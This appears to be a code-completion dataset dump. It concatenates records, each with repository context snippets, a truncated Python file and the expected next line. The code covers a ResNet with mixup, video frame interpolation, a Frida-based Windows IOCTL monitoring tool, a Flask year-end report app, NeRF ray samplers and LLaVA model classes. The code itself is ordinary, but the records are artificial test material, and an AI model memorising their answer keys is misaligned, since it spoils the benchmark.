lam = max(lam, 1 - lam)
lam = max(lam, minimum_lambda)
lam = torch.from_numpy(np.array([lam]).astype('float32')).cuda()
lam = Variable(lam)
if target is not None:
target_reweighted = to_one_hot(target, self.num_classes)
if layer_mix == 0:
|
def load_state_dict_from_url(url, model_dir=None, map_location=None, progress=True):
r"""Loads the Torch serialized object at the given URL.
If the object is already present in `model_dir`, it's deserialized and
returned. The filename part of the URL should follow the naming convention
``filename-<sha256>.ext`` where ``<sha256>`` is the first eight or more
digits of the SHA256 hash of the contents of the file. The hash is used to
ensure unique names and to verify the contents of the file.
The default value of `model_dir` is ``$TORCH_HOME/checkpoints`` where
environment variable ``$TORCH_HOME`` defaults to ``$XDG_CACHE_HOME/torch``.
``$XDG_CACHE_HOME`` follows the X Design Group specification of the Linux
filesytem layout, with a default value ``~/.cache`` if not set.
Args:
url (string): URL of the object to download
model_dir (string, optional): directory in which to save the object
map_location (optional): a function or a dict specifying how to remap storage locations (see torch.load)
progress (bool, optional): whether or not to display a progress bar to stderr
Example:
>>> state_dict = torch.hub.load_state_dict_from_url('https://s3.amazonaws.com/pytorch/models/resnet18-5c106cde.pth')
"""
# Issue warning to move data if old env is set
if os.getenv('TORCH_MODEL_ZOO'):
warnings.warn('TORCH_MODEL_ZOO is deprecated, please use env TORCH_HOME instead')
if model_dir is None:
torch_home = _get_torch_home()
model_dir = os.path.join(torch_home, 'checkpoints')
try:
os.makedirs(model_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# Directory already exists, ignore.
pass
else:
# Unexpected OSError, re-raise.
raise
parts = urlparse(url)
filename = os.path.basename(parts.path)
cached_file = os.path.join(model_dir, filename)
if not os.path.exists(cached_file):
sys.stderr.write('Downloading: "{}" to {}\n'.format(url, cached_file))
hash_prefix = HASH_REGEX.search(filename).group(1)
_download_url_to_file(url, cached_file, hash_prefix, progress=progress)
return torch.load(cached_file, map_location=map_location)
def _download_url_to_file(url, dst, hash_prefix, progress):
file_size = None
u = urlopen(url)
meta = u.info()
if hasattr(meta, 'getheaders'):
content_length = meta.getheaders("Content-Length")
else:
content_length = meta.get_all("Content-Length")
if content_length is not None and len(content_length) > 0:
file_size = int(content_length[0])
# We deliberately save it in a temp file and move it after
# download is complete. This prevents a local working checkpoint
# being overriden by a broken download.
dst_dir = os.path.dirname(dst)
f = tempfile.NamedTemporaryFile(delete=False, dir=dst_dir)
try:
if hash_prefix is not None:
sha256 = hashlib.sha256()
with tqdm(total=file_size, disable=not progress,
unit='B', unit_scale=True, unit_divisor=1024) as pbar:
while True:
buffer = u.read(8192)
if len(buffer) == 0:
break
f.write(buffer)
if hash_prefix is not None:
sha256.update(buffer)
pbar.update(len(buffer))
f.close()
if hash_prefix is not None:
digest = sha256.hexdigest()
if digest[:len(hash_prefix)] != hash_prefix:
raise RuntimeError('invalid hash value (expected "{}", got "{}")'
.format(hash_prefix, digest))
shutil.move(f.name, dst)
finally:
f.close()
if os.path.exists(f.name):
os.remove(f.name)
ENV_TORCH_HOME = 'TORCH_HOME'
ENV_XDG_CACHE_HOME = 'XDG_CACHE_HOME'
DEFAULT_CACHE_DIR = '~/.cache'
HASH_REGEX = re.compile(r'-([a-f0-9]*)\.')
def _get_torch_home():
torch_home = os.path.expanduser(
os.getenv(ENV_TORCH_HOME,
os.path.join(os.getenv(ENV_XDG_CACHE_HOME, DEFAULT_CACHE_DIR), 'torch')))
return torch_home
__all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',
'resnet152', 'resnext50_32x4d', 'resnext101_32x8d',
'wide_resnet50_2', 'wide_resnet101_2']
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',
'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',
'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',
'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',
}
def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None, avg_downsample=False):
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
self.stride = stride
self.avg_downsample = avg_downsample
self.avgpool = nn.AvgPool2d(2, stride=2, ceil_mode=True)
self.pad = (0, 0, 0, 0, (planes - inplanes) // 2, (planes - inplanes) // 2)
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
if self.avg_downsample:
x = self.avgpool(x)
identity = nn.functional.pad(x, self.pad)
else:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None):
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
# Both self.conv2 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv1x1(inplanes, width)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups, dilation)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None, avg_downsample=False):
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.num_classes = num_classes
self.dilation = 1
self.avg_downsample = avg_downsample
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
if avg_downsample:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=1, padding=3, bias=False)
else:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
# self.fc = nn.Linear(512 * block.expansion, num_classes,bias=False)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer, self.avg_downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def forward(self, x, target=None, mix_type="vanilla", mixup_alpha=None, num_base_classes=-1,
use_hard_positive_aug=False, add_noise_level=0., mult_noise_level=0., minimum_lambda=0.5,
hpa_type="none", label_sharpening=True, label_mix="vanilla", label_mix_threshold=0.2,
exp_coef=1., cutmix_prob=1., num_similar_class=3, classifiers=None,
gaussian_h1=0.2, piecewise_linear_h1=0.5, piecewise_linear_h2=0., use_softlabel=True):
if "mixup_hidden" in mix_type:
layer_mix = random.randint(0, 3)
else:
layer_mix = None
out = x
if mixup_alpha is not None:
lam = get_lambda(mixup_alpha)
# https://github.com/YU1ut/MixMatch-pytorch/blob/master/train.py#L243
if use_hard_positive_aug:
lam = max(lam, 1 - lam)
lam = max(lam, minimum_lambda)
lam = torch.from_numpy(np.array([lam]).astype('float32')).cuda()
lam = Variable(lam)
if target is not None:
target_reweighted = to_one_hot(target, self.num_classes)
if layer_mix == 0: | out, target_reweighted, mix_label_mask = middle_mixup_process(out, target_reweighted, num_base_classes, | 1 | 2023-10-25 16:50:51+00:00 | 4k |
megvii-research/WACV2024-SAFA | model/flownet.py | [
{
"identifier": "warp",
"path": "model/warplayer.py",
"snippet": "def warp(tenInput, tenFlow, mode='bilinear'):\n k = (str(tenFlow.device), str(tenFlow.size()))\n if k not in backwarp_tenGrid:\n tenHorizontal = torch.linspace(-1.0, 1.0, tenFlow.shape[3]).view(1, 1, 1, tenFlow.shape[3]).expa... | import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models
from model.warplayer import warp
from model.head import Head | 1,723 |
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1, groups=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=True, groups=groups),
nn.PReLU(out_planes)
)
def conv_bn(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(out_planes),
nn.PReLU(out_planes)
)
class Resblock(nn.Module):
def __init__(self, c, dilation=1):
super(Resblock, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
nn.PReLU(c),
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
)
self.beta = nn.Parameter(torch.zeros((1, c, 1, 1)), requires_grad=True)
self.prelu = nn.PReLU(c)
def forward(self, x):
y = self.conv(x)
return self.prelu(y * self.beta + x)
class RoundSTE(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = torch.bernoulli(x)
return y
@staticmethod
def backward(ctx, grad):
return grad, None
class RecurrentBlock(nn.Module):
def __init__(self, c, dilation=1, depth=6):
super(RecurrentBlock, self).__init__()
self.conv_stem = conv(3*c+6+1, c, 3, 1, 1, groups=1)
self.conv_backbone = torch.nn.ModuleList([])
self.depth = depth
for i in range(depth):
self.conv_backbone.append(Resblock(c, dilation))
def forward(self, x, i0, i1, flow, timestep, convflow, getscale):
flow_down = F.interpolate(flow, scale_factor=0.5, mode="bilinear")
i0 = warp(i0, flow_down[:, :2] * 0.5)
i1 = warp(i1, flow_down[:, 2:4] * 0.5)
x = torch.cat((x, flow_down, i0, i1, timestep), 1)
scale = RoundSTE.apply(getscale(x)).unsqueeze(2).unsqueeze(3)
feat = 0
if scale.shape[0] != 1 or (scale[:, 0:1].mean() >= 0.5 and scale[:, 1:2].mean() >= 0.5):
x0 = self.conv_stem(x)
for i in range(self.depth):
x0 = self.conv_backbone[i](x0)
feat = feat + x0 * scale[:, 0:1] * scale[:, 1:2]
if scale.shape[0] != 1 or (scale[:, 0:1].mean() < 0.5 and scale[:, 1:2].mean() >= 0.5):
x1 = self.conv_stem(F.interpolate(x, scale_factor=0.5, mode="bilinear"))
for i in range(self.depth):
x1 = self.conv_backbone[i](x1)
feat = feat + F.interpolate(x1, scale_factor=2.0, mode="bilinear") * (1 - scale[:, 0:1]) * scale[:, 1:2]
if scale.shape[0] != 1 or scale[:, 1:2].mean() < 0.5:
x2 = self.conv_stem(F.interpolate(x, scale_factor=0.25, mode="bilinear"))
for i in range(self.depth):
x2 = self.conv_backbone[i](x2)
feat = feat + F.interpolate(x2, scale_factor=4.0, mode="bilinear") * (1 - scale[:, 1:2])
return feat, convflow(feat) + flow, i0, i1, scale
class Flownet(nn.Module):
def __init__(self, block_num, c=64):
super(Flownet, self).__init__()
|
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1, groups=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=True, groups=groups),
nn.PReLU(out_planes)
)
def conv_bn(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(out_planes),
nn.PReLU(out_planes)
)
class Resblock(nn.Module):
def __init__(self, c, dilation=1):
super(Resblock, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
nn.PReLU(c),
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
)
self.beta = nn.Parameter(torch.zeros((1, c, 1, 1)), requires_grad=True)
self.prelu = nn.PReLU(c)
def forward(self, x):
y = self.conv(x)
return self.prelu(y * self.beta + x)
class RoundSTE(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = torch.bernoulli(x)
return y
@staticmethod
def backward(ctx, grad):
return grad, None
class RecurrentBlock(nn.Module):
def __init__(self, c, dilation=1, depth=6):
super(RecurrentBlock, self).__init__()
self.conv_stem = conv(3*c+6+1, c, 3, 1, 1, groups=1)
self.conv_backbone = torch.nn.ModuleList([])
self.depth = depth
for i in range(depth):
self.conv_backbone.append(Resblock(c, dilation))
def forward(self, x, i0, i1, flow, timestep, convflow, getscale):
flow_down = F.interpolate(flow, scale_factor=0.5, mode="bilinear")
i0 = warp(i0, flow_down[:, :2] * 0.5)
i1 = warp(i1, flow_down[:, 2:4] * 0.5)
x = torch.cat((x, flow_down, i0, i1, timestep), 1)
scale = RoundSTE.apply(getscale(x)).unsqueeze(2).unsqueeze(3)
feat = 0
if scale.shape[0] != 1 or (scale[:, 0:1].mean() >= 0.5 and scale[:, 1:2].mean() >= 0.5):
x0 = self.conv_stem(x)
for i in range(self.depth):
x0 = self.conv_backbone[i](x0)
feat = feat + x0 * scale[:, 0:1] * scale[:, 1:2]
if scale.shape[0] != 1 or (scale[:, 0:1].mean() < 0.5 and scale[:, 1:2].mean() >= 0.5):
x1 = self.conv_stem(F.interpolate(x, scale_factor=0.5, mode="bilinear"))
for i in range(self.depth):
x1 = self.conv_backbone[i](x1)
feat = feat + F.interpolate(x1, scale_factor=2.0, mode="bilinear") * (1 - scale[:, 0:1]) * scale[:, 1:2]
if scale.shape[0] != 1 or scale[:, 1:2].mean() < 0.5:
x2 = self.conv_stem(F.interpolate(x, scale_factor=0.25, mode="bilinear"))
for i in range(self.depth):
x2 = self.conv_backbone[i](x2)
feat = feat + F.interpolate(x2, scale_factor=4.0, mode="bilinear") * (1 - scale[:, 1:2])
return feat, convflow(feat) + flow, i0, i1, scale
class Flownet(nn.Module):
def __init__(self, block_num, c=64):
super(Flownet, self).__init__() | self.convimg = Head(c) | 1 | 2023-10-26 09:24:29+00:00 | 4k |
Z4kSec/IoctlHunter | ioctl_hunter/lib/hooking.py | [
{
"identifier": "State",
"path": "ioctl_hunter/lib/state.py",
"snippet": "class State:\n results = Results()\n\n script = None\n cur_proc = None\n\n quiet = False\n running = True\n hook_enabled = False\n debug_enabled = False\n hex_out_enabled = False\n\n included_drivers = [... | import ast
import time
import frida
import psutil
import logging
import datetime
from urllib.parse import unquote
from .state import State
from ..utils.misc import (
get_ioctl_code_details,
get_hex_from_hexdump,
get_frida_script_content,
)
from ..ui.display import print_ioctl, print_loaded_driver, print_final_recap | 1,785 |
logger = logging.getLogger("ioctl-hunter")
def check_drivers_filters(ioctl_dict):
if State.results.included_drivers:
for driver in State.results.included_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
return False
ret = False
if State.results.excluded_drivers:
for driver in State.results.excluded_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
ret = True
break
return ret
def check_ioctls_filters(ioctl_dict):
if (
State.results.included_ioctls
and ioctl_dict["ioctl"] in State.results.included_ioctls
):
return False
if (
State.results.excluded_ioctls
and ioctl_dict["ioctl"] in State.results.excluded_ioctls
):
return True
return False
def process_device_ioctl_queue():
ioctls_queue = State.script.exports.getQueueDeviceIoctl()
open_handles = State.script.exports.getOpenHandles()
for ioctl_elem in ioctls_queue:
ioctl_dict = ioctl_elem
try:
ioctl_dict = ast.literal_eval(ioctl_elem)
except:
try:
ioctl_dict = ast.literal_eval(
ioctl_elem.replace("\\", "\\\\").replace("\n", "\\n")
)
except Exception as e:
logger.error(str(e))
logger.error(ioctl_elem)
continue
ioctl_dict["timestamp"] = str(datetime.datetime.now())
ioctl_dict["handle_device"] = {
"dec": ioctl_dict["handle_device"],
"hex": "{0:#010x}".format(int(ioctl_dict["handle_device"])),
}
if ioctl_dict["handle_path"]:
pass
elif open_handles.get(ioctl_dict["handle_device"]["dec"], None):
ioctl_dict["handle_path"] = open_handles.get(
ioctl_dict["handle_device"]["dec"]
)
else:
logger.error(open_handles)
ioctl_dict["handle_path"] = "N/A"
if check_drivers_filters(ioctl_dict):
continue
if check_ioctls_filters(ioctl_dict):
continue
device, access, function, method = get_ioctl_code_details(ioctl_dict["ioctl"])
ioctl_dict["ioctl"] = {
"dec": ioctl_dict["ioctl"],
"hex": "{0:#010x}".format(int(ioctl_dict["ioctl"])),
"details": {
"device": device,
"access": access,
"function": function,
"method": method,
},
}
ioctl_dict["buff_in"]["hexdump"] = unquote(ioctl_dict["buff_in"]["hexdump"])
ioctl_dict["buff_in"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_in"]["hexdump"]
)
ioctl_dict["buff_out"]["hexdump"] = unquote(ioctl_dict["buff_out"]["hexdump"])
ioctl_dict["buff_out"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_out"]["hexdump"]
)
print_ioctl(ioctl_dict)
State.results.add_ioctl(ioctl_dict)
return True
def process_loaded_drivers_queue():
loaded_drivers_queue = State.script.exports.getQueueLoadedDrivers()
if loaded_drivers_queue:
for loaded_driver in loaded_drivers_queue:
loaded_driver["timestamp"] = str(datetime.datetime.now())
State.results.add_loaded_driver(loaded_driver)
|
logger = logging.getLogger("ioctl-hunter")
def check_drivers_filters(ioctl_dict):
if State.results.included_drivers:
for driver in State.results.included_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
return False
ret = False
if State.results.excluded_drivers:
for driver in State.results.excluded_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
ret = True
break
return ret
def check_ioctls_filters(ioctl_dict):
if (
State.results.included_ioctls
and ioctl_dict["ioctl"] in State.results.included_ioctls
):
return False
if (
State.results.excluded_ioctls
and ioctl_dict["ioctl"] in State.results.excluded_ioctls
):
return True
return False
def process_device_ioctl_queue():
ioctls_queue = State.script.exports.getQueueDeviceIoctl()
open_handles = State.script.exports.getOpenHandles()
for ioctl_elem in ioctls_queue:
ioctl_dict = ioctl_elem
try:
ioctl_dict = ast.literal_eval(ioctl_elem)
except:
try:
ioctl_dict = ast.literal_eval(
ioctl_elem.replace("\\", "\\\\").replace("\n", "\\n")
)
except Exception as e:
logger.error(str(e))
logger.error(ioctl_elem)
continue
ioctl_dict["timestamp"] = str(datetime.datetime.now())
ioctl_dict["handle_device"] = {
"dec": ioctl_dict["handle_device"],
"hex": "{0:#010x}".format(int(ioctl_dict["handle_device"])),
}
if ioctl_dict["handle_path"]:
pass
elif open_handles.get(ioctl_dict["handle_device"]["dec"], None):
ioctl_dict["handle_path"] = open_handles.get(
ioctl_dict["handle_device"]["dec"]
)
else:
logger.error(open_handles)
ioctl_dict["handle_path"] = "N/A"
if check_drivers_filters(ioctl_dict):
continue
if check_ioctls_filters(ioctl_dict):
continue
device, access, function, method = get_ioctl_code_details(ioctl_dict["ioctl"])
ioctl_dict["ioctl"] = {
"dec": ioctl_dict["ioctl"],
"hex": "{0:#010x}".format(int(ioctl_dict["ioctl"])),
"details": {
"device": device,
"access": access,
"function": function,
"method": method,
},
}
ioctl_dict["buff_in"]["hexdump"] = unquote(ioctl_dict["buff_in"]["hexdump"])
ioctl_dict["buff_in"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_in"]["hexdump"]
)
ioctl_dict["buff_out"]["hexdump"] = unquote(ioctl_dict["buff_out"]["hexdump"])
ioctl_dict["buff_out"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_out"]["hexdump"]
)
print_ioctl(ioctl_dict)
State.results.add_ioctl(ioctl_dict)
return True
def process_loaded_drivers_queue():
loaded_drivers_queue = State.script.exports.getQueueLoadedDrivers()
if loaded_drivers_queue:
for loaded_driver in loaded_drivers_queue:
loaded_driver["timestamp"] = str(datetime.datetime.now())
State.results.add_loaded_driver(loaded_driver) | print_loaded_driver(loaded_driver) | 5 | 2023-10-31 22:38:36+00:00 | 4k |
7Wate/EndOfYear | main.py | [
{
"identifier": "const",
"path": "src/const.py",
"snippet": "SITE_NAME = \"EndOfYear\"\nSITE_SERVICE_WEB = 1\nSITE_SERVICE_STATIC = 0\nTIME_ZONE = \"Asia/Shanghai\"\nFORMAT_TIME = \"%Y-%m-%d %H:%M:%S\"\nBLOG_POST_CATEGORY_LIFE = 1\nBLOG_POST_CATEGORY_TECH = 2\nBLOG_MAX_KEYS = 7\nLUNAR_HOLIDAYS = {\n ... | from flask import Flask, render_template, redirect, url_for
from loguru import logger
from src import const
from src import models
from src import tools
from src.config import Config
from src.generator import Generator | 2,249 |
app = Flask(__name__)
logger.add("endofyear.log")
@app.route('/')
def home():
# 重定向 painting
return redirect(url_for('painting'))
@app.route('/painting')
def painting():
# 读取配置文件
config = Config("config.ini")
# 站点数据
|
app = Flask(__name__)
logger.add("endofyear.log")
@app.route('/')
def home():
# 重定向 painting
return redirect(url_for('painting'))
@app.route('/painting')
def painting():
# 读取配置文件
config = Config("config.ini")
# 站点数据 | site = models.Site( | 1 | 2023-10-30 03:07:17+00:00 | 4k |
masked-spacetime-hashing/msth | nerfstudio/model_components/ray_samplers.py | [
{
"identifier": "Frustums",
"path": "nerfstudio/cameras/rays.py",
"snippet": "class Frustums(TensorDataclass):\n \"\"\"Describes region of space as a frustum.\"\"\"\n\n origins: TensorType[\"bs\":..., 3]\n \"\"\"xyz coordinate for ray origin.\"\"\"\n directions: TensorType[\"bs\":..., 3]\n ... | from abc import abstractmethod
from typing import Callable, List, Optional, Tuple
from nerfacc import OccupancyGrid
from torch import nn
from torchtyping import TensorType
from nerfstudio.cameras.rays import Frustums, RayBundle, RaySamples
import nerfacc
import torch | 2,751 | # Copyright 2022 The Nerfstudio Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Collection of sampling strategies
"""
class Sampler(nn.Module):
"""Generate Samples
Args:
num_samples: number of samples to take
"""
def __init__(
self,
num_samples: Optional[int] = None,
) -> None:
super().__init__()
self.num_samples = num_samples
@abstractmethod
| # Copyright 2022 The Nerfstudio Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Collection of sampling strategies
"""
class Sampler(nn.Module):
"""Generate Samples
Args:
num_samples: number of samples to take
"""
def __init__(
self,
num_samples: Optional[int] = None,
) -> None:
super().__init__()
self.num_samples = num_samples
@abstractmethod | def generate_ray_samples(self) -> RaySamples: | 2 | 2023-10-26 04:39:15+00:00 | 4k |
sehyunkwon/ICTC | step1/llava/model/language_model/llava_llama.py | [
{
"identifier": "LlavaMetaModel",
"path": "step1/llava/model/llava_arch.py",
"snippet": "class LlavaMetaModel:\n\n def __init__(self, config):\n super(LlavaMetaModel, self).__init__(config)\n\n if hasattr(config, \"mm_vision_tower\"):\n self.vision_tower = build_vision_tower(... | from typing import List, Optional, Tuple, Union
from torch.nn import CrossEntropyLoss
from transformers import AutoConfig, AutoModelForCausalLM, \
LlamaConfig, LlamaModel, LlamaForCausalLM
from transformers.modeling_outputs import CausalLMOutputWithPast
from ..llava_arch import LlavaMetaModel, LlavaMetaForCausalLM
import torch
import torch.nn as nn | 3,209 | # Copyright 2023 Haotian Liu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LlavaConfig(LlamaConfig):
model_type = "llava"
class LlavaLlamaModel(LlavaMetaModel, LlamaModel):
config_class = LlavaConfig
def __init__(self, config: LlamaConfig):
super(LlavaLlamaModel, self).__init__(config)
| # Copyright 2023 Haotian Liu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LlavaConfig(LlamaConfig):
model_type = "llava"
class LlavaLlamaModel(LlavaMetaModel, LlamaModel):
config_class = LlavaConfig
def __init__(self, config: LlamaConfig):
super(LlavaLlamaModel, self).__init__(config)
| class LlavaLlamaForCausalLM(LlamaForCausalLM, LlavaMetaForCausalLM): | 1 | 2023-10-27 05:00:14+00:00 | 4k |
jgujerry/pythonframeworks | frameworks.py | [
{
"identifier": "route",
"path": "bottle.py",
"snippet": "def route(self, path=None, method='GET', callback=None, name=None,\n apply=None, skip=None, **config):\n \"\"\" A decorator to bind a function to a request URL. Example::\n\n @app.route('/hello/:name')\n def hell... | from bottle import route, run, template, static_file | 1,739 |
@route("/")
def index():
return template("index.html")
@route("/static/<filename:path>")
def static(filename):
|
@route("/")
def index():
return template("index.html")
@route("/static/<filename:path>")
def static(filename): | return static_file(filename, root="static") | 3 | 2023-10-29 12:19:46+00:00 | 4k |
phineas-pta/comfy-trt-test | comfy_trt/node_unet.py | [
{
"identifier": "TRT_MODEL_DIR",
"path": "comfy_trt/model_manager.py",
"snippet": "BASE_PATH = os.path.dirname(os.path.realpath(__file__))\nONNX_MODEL_DIR = os.path.join(BASE_PATH, \"Unet-onnx\")\nTRT_MODEL_DIR = os.path.join(BASE_PATH, \"Unet-trt\")\nMODEL_FILE = os.path.join(TRT_MODEL_DIR, \"model.jso... | import os
import torch
import comfy.supported_models as LIST_MODELS # used in eval() - do not remove
from torch.cuda import nvtx
